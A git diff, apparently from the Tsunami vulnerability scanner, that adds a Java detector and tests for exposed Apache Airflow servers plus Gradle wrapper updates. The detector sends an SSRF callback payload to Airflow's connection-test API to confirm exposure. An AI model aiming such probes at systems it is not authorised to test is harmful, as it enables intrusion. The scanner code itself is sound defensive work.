a/community/detectors/apache_airflow_exposed_ui/gradlew.bat b/community/detectors/apache_airflow_exposed_ui/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/gradlew.bat @@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/apache_airflow_exposed_ui/settings.gradle b/community/detectors/apache_airflow_exposed_ui/settings.gradle new file mode 100644 index 000000000..a76b2099c --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'exposedairflowserver' diff --git a/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetector.java b/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetector.java new file mode 100644 index 000000000..704ed8887 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetector.java @@ -0,0 +1,246 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.exposedui; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.gson.JsonObject; +import com.google.gson.JsonParser; +import com.google.gson.JsonSyntaxException; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionReportList.Builder; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import java.util.Objects; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import javax.inject.Inject; +import org.jsoup.Jsoup; +import org.jsoup.nodes.Document; +import org.jsoup.nodes.Element; + +/** A VulnDetector plugin for Exposed Apache Airflow Server. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "Exposed Apache Airflow Server Detector", + version = "0.1", + description = + "This detector checks for occurrences of exposed apache airflow server installations.", + author = "am0o0", + bootstrapModule = ExposedAirflowServerDetectorModule.class) +@ForWebService +public final class ExposedAirflowServerDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + + @Inject + ExposedAirflowServerDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(true).build(); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + + Builder detectionReport = DetectionReportList.newBuilder(); + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isApacheAirflow) + .forEach( + networkService -> { + if (isServiceVulnerableCheckOutOfBandCallback(networkService)) { + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Apache Airflow Server is misconfigured and can be accessed publicly," + + " Tsunami security scanner confirmed this by sending an HTTP request" + + " with test connection API and receiving the corresponding callback" + + " on tsunami callback server", + Severity.CRITICAL)); + } else if (isServiceVulnerableCheckResponse(networkService)) { + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Apache Airflow Server is misconfigured and can be accessed " + + "publicly, We confirmed this by checking API endpoint and matching " + + "the responses with our pattern", + Severity.HIGH)); + } + }); + return detectionReport.build(); + } + + public boolean isApacheAirflow(NetworkService networkService) { + logger.atInfo().log("probing apache airflow login page - custom fingerprint phase"); + + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + var loginPageUrl = String.format("http://%s/%s", uriAuthority, "login"); + try { + HttpResponse loginResponse = + this.httpClient.send(get(loginPageUrl).withEmptyHeaders().build()); + if (!(loginResponse.status() == HttpStatus.OK && loginResponse.bodyString().isPresent())) { + return false; + } + Document doc = Jsoup.parse(loginResponse.bodyString().get()); + if (!Objects.equals(doc.title(), "Sign In - Airflow")) { + return false; + } + for (Element anchor : doc.getElementsByTag("a")) { + if (anchor.attr("href").equals("https://airflow.apache.org") + && Objects.equals(anchor.text(), "Airflow Website")) { + return true; + } + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", loginPageUrl); + } + return false; + } + + private boolean isServiceVulnerableCheckOutOfBandCallback(NetworkService networkService) { + var payload = getTsunamiCallbackHttpPayload(); + if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log("Tsunami callback server is not setup for this environment."); + return false; + } + + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + try { + String payloadString = payload.getPayload(); + String payloadWithoutProtocol; + // I noticed that there are two types of SSRF payload, one the payload exists as a + // subdomain and other exists as an http path + if (payloadString.contains("http://") || payloadString.contains("https://")) { + Matcher m = Pattern.compile("https?://(.*)").matcher(payloadString); + if (!m.find()) { + return false; + } + payloadWithoutProtocol = m.group(1); + } else { + payloadWithoutProtocol = payloadString; + } + String body = + "{\"connection_id\":\"tsunami\",\"conn_type\":\"http\",\"host\":\"SSRF_PAYLOAD\",\"extra\":\"{}\"}" + .replace("SSRF_PAYLOAD", payloadWithoutProtocol); + this.httpClient.send( + post(rootUrl + "api/v1/connections/test") + .setHeaders( + HttpHeaders.builder().addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8(body)) + .build(), + networkService); + + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(2)); + return payload.checkIfExecuted(); + } catch (IOException | RuntimeException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } + + private boolean isServiceVulnerableCheckResponse(NetworkService networkService) { + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + try { + HttpResponse dags = + this.httpClient.send( + get(rootUrl + "api/v1/dags").withEmptyHeaders().build(), networkService); + if (dags.bodyString().isEmpty()) { + return false; + } + JsonObject response = JsonParser.parseString(dags.bodyString().get()).getAsJsonObject(); + return response.has("total_entries") && response.has("dags"); + } catch (IllegalStateException | IOException | JsonSyntaxException e) { + return false; + } + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build()); + } catch (NotImplementedException n) { + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, + NetworkService vulnerableNetworkService, + String description, + Severity severity) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("APACHE_AIRFLOW_SERVER_EXPOSED")) + .setSeverity(severity) + .setTitle("Exposed Apache Airflow Server") + .setDescription(description) + .setRecommendation("Please disable public access to your apache airflow instance.")) + .build(); + } +} diff --git a/community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorBootstrapModule.java b/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorModule.java similarity index 70% rename from community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorBootstrapModule.java rename to community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorModule.java index 4eb306381..321d2ac47 100644 --- a/community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorBootstrapModule.java +++ b/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorModule.java @@ -1,5 +1,5 @@ /* - * Copyright 2021 Google LLC + * Copyright 2024 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. @@ -13,15 +13,15 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -package com.google.tsunami.plugins.detectors.cves.cve20231177; -import com.google.tsunami.plugin.PluginBootstrapModule; +package com.google.tsunami.plugins.exposedui; -/** An CVE-2023-1177 Guice module that bootstraps the {@link Cve20231177Detector}. */ -public final class Cve20231177DetectorBootstrapModule extends PluginBootstrapModule { +import com.google.tsunami.plugin.PluginBootstrapModule; +/** A module registering the detector for Exposed Airflow Server. */ +public final class ExposedAirflowServerDetectorModule extends PluginBootstrapModule { @Override protected void configurePlugin() { - registerPlugin(Cve20231177Detector.class); + registerPlugin(ExposedAirflowServerDetector.class); } } diff --git a/community/detectors/apache_airflow_exposed_ui/src/test/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorTest.java b/community/detectors/apache_airflow_exposed_ui/src/test/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorTest.java new file mode 100644 index 000000000..11ab9ed4f --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/src/test/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorTest.java @@ -0,0 +1,264 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.exposedui; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for the {@link ExposedAirflowServerDetector}. */ +@RunWith(JUnit4.class) +public final class ExposedAirflowServerDetectorTest { + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject private ExposedAirflowServerDetector detector; + + private void createInjector() { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new ExposedAirflowServerDetectorModule()) + .injectMembers(this); + } + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + } + + @After + public void tearDown() throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_withCallbackServer_onVulnerableTarget_returnsVulnerability() + throws IOException { + startMockWebServer(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(2); + assertThat(detectionReports.getDetectionReportsList()) + .comparingExpectedFieldsOnly() + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("APACHE_AIRFLOW_SERVER_EXPOSED")) + .setSeverity(Severity.CRITICAL) + .setTitle("Exposed Apache Airflow Server") + .setDescription( + "Apache Airflow Server is misconfigured and can be accessed publicly," + + " Tsunami security scanner confirmed this by sending an HTTP" + + " request with test connection API and receiving the" + + " corresponding callback on tsunami callback server") + .setRecommendation( + "Please disable public access to your apache airflow instance.")) + .build()); + } + + @Test + public void detect_withCallbackServer_butNoCallback_returnsEmpty() throws IOException { + mockTargetService.enqueue(new MockResponse().setResponseCode(400)); + mockTargetService.enqueue(new MockResponse().setResponseCode(400)); + mockTargetService.enqueue(new MockResponse().setResponseCode(400)); + mockTargetService.start(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + @Test + public void detect_no_airflow_webservice_returnsEmpty() throws IOException { + mockTargetService.enqueue(new MockResponse().setResponseCode(400)); + mockTargetService.start(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .addSupportedHttpMethods("GET") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + @Test + public void detect_withResponseMatching_insteadof_withoutCallbackServer() throws IOException { + startMockWebServer(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(3); + assertThat(detectionReports.getDetectionReportsList()) + .comparingExpectedFieldsOnly() + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("APACHE_AIRFLOW_SERVER_EXPOSED")) + .setSeverity(Severity.HIGH) + .setTitle("Exposed Apache Airflow Server") + .setDescription( + "Apache Airflow Server is misconfigured and can be accessed publicly," + + " We confirmed this by checking API endpoint and matching the" + + " responses with our pattern") + .setRecommendation( + "Please disable public access to your apache airflow instance.")) + .build()); + } + + private void startMockWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + + @Override + public MockResponse dispatch(RecordedRequest request) { + switch (request.getPath()) { + case "/login": + return new MockResponse() + .setResponseCode(200) + .setBody( + "\n" + + "\n" + + " \n" + + " Sign In - Airflow\n" + + " \n" + + "" + + " " + + "Airflow Website" + + ""); + case "/api/v1/dags": + return new MockResponse() + .setResponseCode(200) + .setBody( + "{\"dags\": [{\"next_dagrun_create_after\":" + + " \"2019-08-24T14:15:22Z\"}],\"total_entries\": 0}"); + case "/api/v1/connections/test": + return new MockResponse().setResponseCode(200); + default: + return new MockResponse().setResponseCode(400); + } + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + } +} diff --git a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew +++ b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args 